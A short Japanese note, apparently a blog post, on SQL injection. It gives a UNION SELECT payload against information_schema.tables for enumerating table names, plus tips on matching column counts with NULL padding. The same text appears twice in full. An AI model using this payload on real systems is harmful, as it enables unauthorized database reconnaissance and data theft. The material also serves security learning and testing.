SQLインジェクション攻撃SQLポイント
以下のSQL文でテーブル名を見れる。
' UNION SELECT table_schema,table_name,table_type,engine FROM information_schema.tables #
この文のselect parameterの数と実際のSQLにあるselect parameterの数を一緒にしないと、SQL文法エラーがでるので、注意すべき。
nullで埋めて、parameter数を試すのは一般的なやりかた。
以下のSQL文でテーブル名を見れる。
' UNION SELECT table_schema,table_name,table_type,engine FROM information_schema.tables #
この文のselect parameterの数と実際のSQLにあるselect parameterの数を一緒にしないと、SQL文法エラーがでるので、注意すべき。
nullで埋めて、parameter数を試すのは一般的なやりかた。
0コメント